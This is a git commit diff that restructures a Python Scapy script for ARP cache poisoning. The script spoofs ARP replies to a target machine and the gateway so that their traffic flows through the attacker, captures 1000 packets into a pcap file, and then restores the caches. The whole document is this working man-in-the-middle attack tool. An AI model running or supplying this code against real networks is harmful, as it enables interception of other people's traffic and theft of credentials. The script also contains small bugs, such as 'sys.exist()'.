scapy scripts (including ddos)

2025-05-03 15:24:59 -04:00 · 2014-12-28 15:50:05 -05:00 · 2014-12-28 15:50:05 -05:00 · 8ca96e0b02
commit 8ca96e0b02
parent 2acc68c3dd
28 changed files with 172723 additions and 125 deletions
--- a/Network_and_802.11/scapy/arp_cache_poisoning.py
+++ b/Network_and_802.11/scapy/arp_cache_poisoning.py
@ -15,40 +15,36 @@ import sys
 import threading
 import signal

-# sends out the appropriate ARP packets to the network broadcast address to reset
-# the ARP caches of the gateway and target machines
+
+# constants
+INTERFACE       =   'wlp1s0'
+TARGET_IP       =   '192.168.1.107'
+GATEWAY_IP      =   '192.168.1.1'
+PACKET_COUNT    =   1000
+
+
 def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    print '[*] Restoring targets...'
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', \
        hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", \
        hwsrc=target_mac), count=5)
-
-    # signals the main thread to exit
    os.kill(os.getpid(), signal.SIGINT)

-# use the srp (send and receive packet) function to emit an ARP request to the
-# specified IP address in order to resolve the MAC address
+
 def get_mac(ip_address):
    response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
        timeout=2, retry=10)
-
-    # return the MAC address from a response
    for s, r in response:
        return r[Ether].src
-
    return None

-# builds up ARP requests for poisoning both the target IP and the gateway
-# we keep emitting the ARP requests in a loop to make sure that the ARP entries
-# remain poisoned during the attack
 def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
-
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
@ -56,12 +52,10 @@ def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_gateway.hwdst = gateway_mac

    print '[*] Beginning the ARP poison. [CTRL-C to stop]'
-
    while 1:
        try:
            send(poison_target)
            send(poison_gateway)
-
            time.sleep(2)

        except KeyboardInterrupt:
@ -70,59 +64,57 @@ def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
        print '[*] ARP poison attack finished.'
        return

-INTERFACE       =   'wlp1s0'
-TARGET_IP       =   '192.168.1.107'
-GATEWAY_IP      =   '192.168.1.1'
-PACKET_COUNT    =   1000
+if __name__ == '__main__':

-# set our interface
-conf.iface = INTERFACE

-# turn off output
-conf.verb = 0
+    # set our interface
+    conf.iface = INTERFACE

-print "[*] Setting up %s" % INTERFACE
+    # turn off output
+    conf.verb = 0

-# resolve the gateway
-GATEWAY_MAC = get_mac(GATEWAY_IP)
+    print "[*] Setting up %s" % INTERFACE

-if GATEWAY_MAC is None:
-    print "[-] Failed to get gateway MAC. Exiting."
-    sys.exit(0)
-else:
-    print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)
+    # resolve the gateway
+    GATEWAY_MAC = get_mac(GATEWAY_IP)

-# resolve the target MAC address
-TARGET_MAC = get_mac(TARGET_IP)
-if TARGET_MAC is None:
-    print "[-] Failed to get target MAC. Exiting."
-    sys.exit(0)
-else:
-    print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)
+    if GATEWAY_MAC is None:
+        print "[-] Failed to get gateway MAC. Exiting."
+        sys.exit(0)
+    else:
+        print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)

-# start poison thread to perform the ARP poisoning attack
-poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
-    TARGET_IP, TARGET_MAC))
-poison_thread.start()
+    # resolve the target MAC address
+    TARGET_MAC = get_mac(TARGET_IP)
+    if TARGET_MAC is None:
+        print "[-] Failed to get target MAC. Exiting."
+        sys.exit(0)
+    else:
+        print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)

-try:
-    print '[*] Starting sniffer for %d packets' %PACKET_COUNT
-    bpf_filter = 'IP host ' + TARGET_IP
-    # start the sniffer that will capture a preset amount of packets using
-    # a BPF filter to only capture traffic for our target IP ADDRESS
-    packets = sniff(count=PACKET_COUNT, filter=bpf_filter, iface=INTERFACE)
+    # start poison thread to perform the ARP poisoning attack
+    poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
+        TARGET_IP, TARGET_MAC))
+    poison_thread.start()

-    # write out the captured packets
-    wrpcap('arper.pcap', packets)
+    try:
+        print '[*] Starting sniffer for %d packets' %PACKET_COUNT
+        bpf_filter = 'IP host ' + TARGET_IP
+        # start the sniffer that will capture a preset amount of packets using
+        # a BPF filter to only capture traffic for our target IP ADDRESS
+        packets = sniff(count=PACKET_COUNT, iface=INTERFACE)

-    # restore the network
-    restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
+        # write out the captured packets
+        wrpcap('arper.pcap', packets)

-except Scapy_Exception as msg:
-    print msg, "Hi there!!"
+        # restore the network
+        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)

-except KeyboardInterrupt:
-    # restore the network
-    restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
-    sys.exist()
+    except Scapy_Exception as msg:
+        print msg, "Hi there!!"
+
+    except KeyboardInterrupt:
+        # restore the network
+        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
+        sys.exist()